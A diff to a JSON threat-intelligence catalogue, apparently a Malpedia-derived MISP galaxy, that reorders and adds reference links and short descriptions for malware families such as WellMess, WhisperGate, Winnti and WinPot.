- "https://krabsonsecurity.com/2020/09/04/bitrat-pt-2-hidden-browser-socks5-proxy-and-unknownproducts-unmasked/",
- "https://krebsonsecurity.com/2019/04/whos-behind-the-revcode-webmonitor-rat/",
"https://revcode.se/product/webmonitor/",
+ "https://krebsonsecurity.com/2019/04/whos-behind-the-revcode-webmonitor-rat/",
"https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-actors-target-comm-apps-such-as-zoom-slack-discord",
+ "https://krabsonsecurity.com/2020/09/04/bitrat-pt-2-hidden-browser-socks5-proxy-and-unknownproducts-unmasked/",
"https://researchcenter.paloaltonetworks.com/2018/04/unit42-say-cheese-webmonitor-rat-comes-c2-service-c2aas/"
],
"synonyms": [
@@ -47812,35 +50370,26 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.wellmess",
- "https://us-cert.cisa.gov/ncas/alerts/aa21-116a",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf",
- "https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html",
- "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf",
"https://www.lac.co.jp/lacwatch/pdf/20180614_cecreport_vol3.pdf",
- "https://blog.jpcert.or.jp/2018/07/malware-wellmes-9b78.html",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://securelist.com/apt-trends-report-q2-2020/97937/",
- "https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html",
- "https://www.botconf.eu/wp-content/uploads/2018/12/2018-Y-Ishikawa-S-Nagano-Lets-go-with-a-Go-RAT-_final.pdf",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b",
- "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
- "https://blog.talosintelligence.com/2020/08/attribution-puzzle.html",
- "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
"https://community.riskiq.com/article/541a465f/description",
- "https://us-cert.cisa.gov/sites/default/files/publications/AA21-116A_Russian_Foreign_Intelligence_Service_Cyber_Operations_508C.pdf"
+ "https://securelist.com/apt-trends-report-q2-2020/97937/",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b",
+ "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html",
+ "https://blog.talosintelligence.com/2020/08/attribution-puzzle.html",
+ "https://us-cert.cisa.gov/sites/default/files/publications/AA21-116A_Russian_Foreign_Intelligence_Service_Cyber_Operations_508C.pdf",
+ "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf",
+ "https://www.botconf.eu/wp-content/uploads/2018/12/2018-Y-Ishikawa-S-Nagano-Lets-go-with-a-Go-RAT-_final.pdf",
+ "https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html",
+ "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
+ "https://us-cert.cisa.gov/ncas/alerts/aa21-116a",
+ "https://blog.jpcert.or.jp/2018/07/malware-wellmes-9b78.html",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "4fe80228-1142-4e70-9df8-c8f1f3356cfb",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "d84ebd91-58f6-459f-96a1-d028a1719914",
"value": "WellMess"
},
@@ -47857,79 +50406,98 @@
"uuid": "8ec2d984-8c10-49f2-ad97-64af275a7afc",
"value": "WeSteal"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.whiskerspy",
+ "https://www.trendmicro.com/en_us/research/23/b/earth-kitsune-delivers-new-whiskerspy-backdoor.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "821b2c61-31b0-41f5-b604-e58678bf287b",
+ "value": "WhiskerSpy"
+ },
{
"description": "Destructive malware deployed against targets in Ukraine in January 2022.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.whispergate",
- "https://blogs.blackberry.com/en/2022/02/threat-spotlight-whispergate-wiper-wreaks-havoc-in-ukraine",
- "https://github.com/OALabs/Lab-Notes/blob/main/WhisperGate/WhisperGate.ipynb",
- "https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/",
- "https://www.cadosecurity.com/resources-for-dfir-professionals-responding-to-whispergate-malware/",
- "https://unit42.paloaltonetworks.com/atoms/ruinousursa/",
- "https://www.crowdstrike.com/blog/lessons-from-past-cyber-operations-against-ukraine/",
- "https://inquest.net/blog/2022/02/10/380-glowspark",
- "https://unit42.paloaltonetworks.com/ukraine-cyber-conflict-cve-2021-32648-whispergate/",
- "https://www.crowdstrike.com/blog/technical-analysis-of-whispergate-malware/",
- "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/",
- "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
- "https://blog.talosintelligence.com/2022/01/ukraine-campaign-delivers-defacement.html",
- "https://www.crowdstrike.com/blog/who-is-ember-bear/",
- "https://www.secureworks.com/blog/disruptive-attacks-in-ukraine-likely-linked-to-escalating-tensions",
- "https://www.secureworks.com/blog/whispergate-not-notpetya",
- "https://twitter.com/HuskyHacksMK/status/1482876242047258628",
- "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd",
- "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat",
- "https://intel471.com/blog/russia-ukraine-conflict-cybercrime-underground",
- "https://www.youtube.com/watch?v=2nd-f1dIfD4",
- "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine",
- "https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/Debugging%20MBR%20-%20IDA%20+%20Bochs%20Emulator/Debugging%20MBR%20-%20IDA%20+%20Bochs%20Emulator.md",
- "https://thehackernews.com/2022/02/putin-warns-russian-critical.html",
- "https://www.microsoft.com/security/blog/2022/01/26/evolved-phishing-device-registration-trick-adds-to-phishers-toolbox-for-victims-without-mfa/",
- "https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/",
- "https://www.bitdefender.com/blog/hotforsecurity/five-things-you-need-to-know-about-the-cyberwar-in-ukraine/",
- "https://lifars.com/2022/03/a-closer-look-at-the-russian-actors-targeting-organizations-in-ukraine/",
- "https://www.netskope.com/blog/netskope-threat-coverage-whispergate",
- "https://blogs.blackberry.com/en/2022/01/threat-thursday-whispergate-wiper",
- "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3",
- "https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html",
- "https://lifars.com/2022/01/a-detailed-analysis-of-whispergate-targeting-ukrainian-organizations/",
- "https://blogs.microsoft.com/on-the-issues/2022/01/15/mstic-malware-cyberattacks-ukraine-government/",
- "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/",
- "https://www.splunk.com/en_us/blog/security/threat-advisory-strt-ta02-destructive-software.html",
- "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
- "https://cert.gov.ua/article/18101",
- "https://twitter.com/nunohaien/status/1484088885575622657",
- "https://csirt-mon.wp.mil.pl/pl/articles6-aktualnosci/analysis-cyberattack-ukrainian-government-resources/",
- "https://twitter.com/Libranalysis/status/1483128221956808704",
- "https://www.crowdstrike.com/blog/how-crowdstrike-protects-against-data-wiping-malware/",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict/IOC%20Resource%20for%20Russia-Ukraine%20Conflict-Related%20Cyberattacks-03032022.pdf",
- "https://stairwell.com/news/whispers-in-the-noise-microsoft-ukraine-whispergate/",
- "https://cyberpeaceinstitute.org/ukraine-timeline-of-cyberattacks",
- "https://www.splunk.com/en_us/blog/security/threat-advisory-strt-ta02-destructive-software.html?splunk",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/update-on-whispergate-destructive-malware-targeting-ukraine.html",
- "https://rxored.github.io/post/analysis/whispergate/whispergate/",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-057A_Destructive_Malware_Targeting_Organizations_in_Ukraine.pdf",
- "https://info.cyborgsecurity.com/hubfs/Emerging%20Threats/WhisperGate%20Malware%20Update%20-%20Emerging%20Threat.pdf",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/growling-bears-make-thunderous-noise.html",
- "https://zetter.substack.com/p/dozens-of-computers-in-ukraine-wiped",
- "https://www.mandiant.com/resources/russia-invasion-ukraine-retaliation",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/return-of-pseudo-ransomware.html",
"https://blog.gigamon.com/2022/01/28/focusing-on-left-of-boom/",
- "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
- "https://therecord.media/second-data-wiper-attack-hits-ukraine-computer-networks/",
- "https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/",
- "https://twitter.com/knight0x07/status/1483401072102502400",
- "https://zetter.substack.com/p/hackers-were-in-ukraine-systems-months",
- "https://maxkersten.nl/binary-analysis-course/malware-analysis/dumping-whispergates-wiper-from-an-eazfuscator-obfuscated-loader/",
"https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord?",
- "https://eclypsium.com/2022/06/02/conti-targets-critical-firmware/",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-057a",
- "https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf",
+ "https://unit42.paloaltonetworks.com/atoms/ruinousursa/",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/return-of-pseudo-ransomware.html",
+ "https://stairwell.com/news/whispers-in-the-noise-microsoft-ukraine-whispergate/",
"https://www.youtube.com/watch?v=Ek3URIaC5O8",
+ "https://www.youtube.com/watch?v=mrTdSdMMgnk",
+ "https://blogs.blackberry.com/en/2022/01/threat-thursday-whispergate-wiper",
+ "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
+ "https://lifars.com/2022/01/a-detailed-analysis-of-whispergate-targeting-ukrainian-organizations/",
+ "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine",
+ "https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/",
+ "https://zetter.substack.com/p/hackers-were-in-ukraine-systems-months",
"https://go.recordedfuture.com/hubfs/reports/pov-2022-0127.pdf",
"https://www.recordedfuture.com/whispergate-malware-corrupts-computers-ukraine/",
- "https://www.brighttalk.com/webcast/15591/534324"
+ "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/",
+ "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd",
+ "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3",
+ "https://github.com/OALabs/Lab-Notes/blob/main/WhisperGate/WhisperGate.ipynb",
+ "https://thehackernews.com/2022/02/putin-warns-russian-critical.html",
+ "https://www.crowdstrike.com/blog/who-is-ember-bear/",
+ "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/update-on-whispergate-destructive-malware-targeting-ukraine.html",
+ "https://blog.talosintelligence.com/2022/01/ukraine-campaign-delivers-defacement.html",
+ "https://www.cadosecurity.com/resources-for-dfir-professionals-responding-to-whispergate-malware/",
+ "https://www.crowdstrike.com/blog/technical-analysis-of-whispergate-malware/",
+ "https://intel471.com/blog/russia-ukraine-conflict-cybercrime-underground",
+ "https://cert.gov.ua/article/18101",
+ "https://twitter.com/Libranalysis/status/1483128221956808704",
+ "https://rxored.github.io/post/analysis/whispergate/whispergate/",
+ "https://maxkersten.nl/binary-analysis-course/malware-analysis/dumping-whispergates-wiper-from-an-eazfuscator-obfuscated-loader/",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-057A_Destructive_Malware_Targeting_Organizations_in_Ukraine.pdf",
+ "https://www.bitdefender.com/blog/hotforsecurity/five-things-you-need-to-know-about-the-cyberwar-in-ukraine/",
+ "https://unit42.paloaltonetworks.com/ukraine-cyber-conflict-cve-2021-32648-whispergate/",
+ "https://blogs.microsoft.com/on-the-issues/2022/01/15/mstic-malware-cyberattacks-ukraine-government/",
+ "https://lifars.com/2022/03/a-closer-look-at-the-russian-actors-targeting-organizations-in-ukraine/",
+ "https://www.brighttalk.com/webcast/15591/534324",
+ "https://csirt-mon.wp.mil.pl/pl/articles6-aktualnosci/analysis-cyberattack-ukrainian-government-resources/",
+ "https://cyberpeaceinstitute.org/ukraine-timeline-of-cyberattacks",
+ "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf",
+ "https://www.netskope.com/blog/netskope-threat-coverage-whispergate",
+ "https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/",
+ "https://twitter.com/nunohaien/status/1484088885575622657",
+ "https://www.microsoft.com/security/blog/2022/01/26/evolved-phishing-device-registration-trick-adds-to-phishers-toolbox-for-victims-without-mfa/",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/growling-bears-make-thunderous-noise.html",
+ "https://blogs.blackberry.com/en/2022/02/threat-spotlight-whispergate-wiper-wreaks-havoc-in-ukraine",
+ "https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/",
+ "https://info.cyborgsecurity.com/hubfs/Emerging%20Threats/WhisperGate%20Malware%20Update%20-%20Emerging%20Threat.pdf",
+ "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
+ "https://twitter.com/HuskyHacksMK/status/1482876242047258628",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/",
+ "https://twitter.com/knight0x07/status/1483401072102502400",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
+ "https://www.secureworks.com/blog/whispergate-not-notpetya",
+ "https://zetter.substack.com/p/dozens-of-computers-in-ukraine-wiped",
+ "https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf",
+ "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat",
+ "https://therecord.media/second-data-wiper-attack-hits-ukraine-computer-networks/",
+ "https://www.youtube.com/watch?v=2nd-f1dIfD4",
+ "https://www.crowdstrike.com/blog/how-crowdstrike-protects-against-data-wiping-malware/",
+ "https://www.splunk.com/en_us/blog/security/threat-advisory-strt-ta02-destructive-software.html",
+ "https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html",
+ "https://inquest.net/blog/2022/02/10/380-glowspark",
+ "https://www.mandiant.com/resources/russia-invasion-ukraine-retaliation",
+ "https://www.elastic.co/fr/security-labs/operation-bleeding-bear",
+ "https://www.splunk.com/en_us/blog/security/threat-advisory-strt-ta02-destructive-software.html?splunk",
+ "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/",
+ "https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-057a",
+ "https://eclypsium.com/2022/06/02/conti-targets-critical-firmware/",
+ "https://www.crowdstrike.com/blog/lessons-from-past-cyber-operations-against-ukraine/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict/IOC%20Resource%20for%20Russia-Ukraine%20Conflict-Related%20Cyberattacks-03032022.pdf",
+ "https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/Debugging%20MBR%20-%20IDA%20+%20Bochs%20Emulator/Debugging%20MBR%20-%20IDA%20+%20Bochs%20Emulator.md",
+ "https://www.secureworks.com/blog/disruptive-attacks-in-ukraine-likely-linked-to-escalating-tensions"
],
"synonyms": [
"PAYWIPE"
@@ -47986,12 +50554,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.windealer",
- "https://blogs.jpcert.or.jp/en/2021/10/windealer.html",
"https://securelist.com/windealer-dealing-on-the-side/105946/",
+ "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_301_shui-leon_en.pdf",
+ "https://mssplab.github.io/threat-hunting/2023/05/08/malware-analysis-windealer.html",
+ "https://securelist.com/windealer-dealing-on-the-side/105946",
"https://blogs.blackberry.com/en/2022/06/threat-thursday-china-based-apt-plays-auto-updater-card-to-deliver-windealer-malware",
"https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_7_leon-niwa-ishimaru_en.pdf",
- "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_301_shui-leon_en.pdf",
- "https://securelist.com/windealer-dealing-on-the-side/105946"
+ "https://blogs.jpcert.or.jp/en/2021/10/windealer.html"
],
"synonyms": [],
"type": []
@@ -48017,9 +50586,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.winmm",
+ "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf",
"https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf",
- "https://securelist.com/analysis/publications/69953/the-naikon-apt/",
- "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf"
+ "https://securelist.com/analysis/publications/69953/the-naikon-apt/"
],
"synonyms": [],
"type": []
@@ -48032,57 +50601,60 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.winnti",
- "https://securelist.com/games-are-over/70991/",
- "http://web.br.de/interaktiv/winnti/english/",
- "https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html",
- "https://github.com/br-data/2019-winnti-analyse/",
- "https://securitynews.sonicwall.com/xmlpost/chinas-winnti-spyder-module/",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/pigs-malware-examining-possible-member-winnti-group/",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://docplayer.net/162112338-Don-t-miss-the-forest-for-the-trees-gleaning-hunting-value-from-too-much-intrusion-data.html",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134508/winnti-more-than-just-a-game-130410.pdf",
- "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf",
"http://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf",
- "https://github.com/TKCERT/winnti-detector",
- "https://www.fireeye.com/blog/threat-research/2021/01/emulation-of-kernel-mode-rootkits-with-speakeasy.html",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-0921.pdf",
- "https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/",
- "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf",
- "https://www.carbonblack.com/2020/02/20/threat-analysis-active-c2-discovery-using-protocol-emulation-part2-winnti-4-0/",
"http://2015.ruxcon.org.au/assets/2015/slides/Ruxcon%202015%20-%20McCormack.pdf",
- "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape",
- "https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan/",
- "https://www.recordedfuture.com/chinese-apt-groups-target-afghan-telecommunications-firm/",
- "https://www.ptsecurity.com/upload/corporate/ru-ru/webinars/ics/winnti-shadowpad.pdf",
- "https://github.com/superkhung/winnti-sniff",
- "https://www.lastline.com/labsblog/helo-winnti-attack-scan/",
- "https://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques",
- "https://content.fireeye.com/api/pdfproxy?id=86840",
- "https://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf",
- "https://content.fireeye.com/apt-41/rpt-apt41/",
- "https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/",
- "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
- "https://securelist.com/apt-trends-report-q3-2020/99204/",
- "https://quointelligence.eu/2020/04/winnti-group-insights-from-the-past/",
- "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/",
- "https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf",
- "https://www.verfassungsschutz.de/download/broschuere-2019-12-bfv-cyber-brief-2019-01.pdf",
- "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/operation-harvest-a-deep-dive-into-a-long-term-campaign/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://github.com/TKCERT/winnti-nmap-script",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage",
- "https://www.trendmicro.com/en_us/research/19/d/analyzing-c-c-runtime-library-code-tampering-in-software-supply-chain-attacks.html",
- "https://www.carbonblack.com/2019/09/04/cb-tau-threat-intelligence-notification-winnti-malware-4-0/",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://github.com/TKCERT/winnti-suricata-lua",
"https://attack.mitre.org/groups/G0096",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf",
+ "https://github.com/TKCERT/winnti-nmap-script",
+ "https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf",
+ "https://quointelligence.eu/2020/04/winnti-group-insights-from-the-past/",
+ "https://securitynews.sonicwall.com/xmlpost/chinas-winnti-spyder-module/",
+ "https://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-0921.pdf",
+ "https://docplayer.net/162112338-Don-t-miss-the-forest-for-the-trees-gleaning-hunting-value-from-too-much-intrusion-data.html",
+ "https://github.com/superkhung/winnti-sniff",
+ "https://www.virusbulletin.com/uploads/pdf/conference/vb2022/slides/VB2022-Tracking-the-entire-iceberg.pdf",
+ "https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/",
+ "https://content.fireeye.com/api/pdfproxy?id=86840",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf",
+ "https://www.recordedfuture.com/chinese-apt-groups-target-afghan-telecommunications-firm/",
+ "https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan/",
+ "https://www.verfassungsschutz.de/download/broschuere-2019-12-bfv-cyber-brief-2019-01.pdf",
"https://www.cybereason.com/blog/operation-cuckoobees-a-winnti-malware-arsenal-deep-dive",
+ "https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html",
+ "https://www.carbonblack.com/2019/09/04/cb-tau-threat-intelligence-notification-winnti-malware-4-0/",
+ "https://www.fireeye.com/blog/threat-research/2021/01/emulation-of-kernel-mode-rootkits-with-speakeasy.html",
+ "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
+ "https://www.lastline.com/labsblog/helo-winnti-attack-scan/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf",
+ "https://www.trendmicro.com/en_us/research/19/d/analyzing-c-c-runtime-library-code-tampering-in-software-supply-chain-attacks.html",
"https://www.tagesschau.de/investigativ/ndr/hackerangriff-chemieunternehmen-101.html",
+ "https://content.fireeye.com/apt-41/rpt-apt41/",
+ "https://github.com/br-data/2019-winnti-analyse/",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/pigs-malware-examining-possible-member-winnti-group/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage",
+ "https://github.com/TKCERT/winnti-detector",
"https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf",
+ "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/operation-harvest-a-deep-dive-into-a-long-term-campaign/",
+ "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/",
"https://www.youtube.com/watch?v=_fstHQSK-kk",
- "https://blogs.vmware.com/security/2021/11/monitoring-winnti-4-0-c2-servers-for-two-years.html"
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://www.ptsecurity.com/upload/corporate/ru-ru/webinars/ics/winnti-shadowpad.pdf",
+ "https://www.carbonblack.com/2020/02/20/threat-analysis-active-c2-discovery-using-protocol-emulation-part2-winnti-4-0/",
+ "http://web.br.de/interaktiv/winnti/english/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape",
+ "https://securelist.com/games-are-over/70991/",
+ "https://www.malwarebytes.com/blog/threat-intelligence/2022/winnti-apt-group-docks-in-sri-lanka-for-new-campaign-final.pdf",
+ "https://www.virusbulletin.com/uploads/pdf/conference/vb2022/papers/VB2022-Tracking-the-entire-iceberg-long-term-APT-malware-C2-protocol-emulation-and-scanning.pdf",
+ "https://github.com/TKCERT/winnti-suricata-lua",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134508/winnti-more-than-just-a-game-130410.pdf",
+ "https://securelist.com/apt-trends-report-q3-2020/99204/",
+ "https://blogs.vmware.com/security/2021/11/monitoring-winnti-4-0-c2-servers-for-two-years.html",
+ "https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/"
],
"synonyms": [
"BleDoor",
@@ -48095,13 +50667,26 @@
"uuid": "7f8166e2-c7f4-4b48-a07b-681b61a8f2c1",
"value": "Winnti (Windows)"
},
+ {
+ "description": "According to ESET Research, this is a payload downloaded by win.wslink. They attribute it with low confidence to Lazarus.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.winordll64",
+ "https://www.welivesecurity.com/2023/02/23/winordll64-backdoor-vast-lazarus-arsenal/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "64f7f940-db4c-4569-869b-d282dadf55ac",
+ "value": "WinorDLL64"
+ },
{
"description": "WinPot is created to make ATMs by a popular ATM vendor to automatically dispense all cash from their most valuable cassettes.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.winpot",
- "https://securelist.com/atm-pos-malware-landscape-2017-2019/96750/",
"https://www.association-secure-transactions.eu/east-publishes-fraud-update-2-2018/",
+ "https://securelist.com/atm-pos-malware-landscape-2017-2019/96750/",
"https://securelist.com/atm-robber-winpot/89611/"
],
"synonyms": [
@@ -48143,11 +50728,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.wipbot",
- "https://docs.broadcom.com/doc/waterbug-attack-group",
"https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/waterbug-attack-group-16-en.pdf",
"https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf",
+ "https://securelist.com/analysis/publications/65545/the-epic-turla-operation/",
"https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf",
- "https://securelist.com/analysis/publications/65545/the-epic-turla-operation/"
+ "https://docs.broadcom.com/doc/waterbug-attack-group"
],
"synonyms": [
"Epic",
@@ -48155,15 +50740,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "36c0faf0-428e-4e7f-93c5-824bb0495ac9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "6b6cf608-cc2c-40d7-8500-afca3e35e7e4",
"value": "Wipbot"
},
@@ -48241,9 +50817,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.woolger",
- "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf",
+ "https://documents.trendmicro.com/assets/wp/wp-operation-woolen-goldfish.pdf",
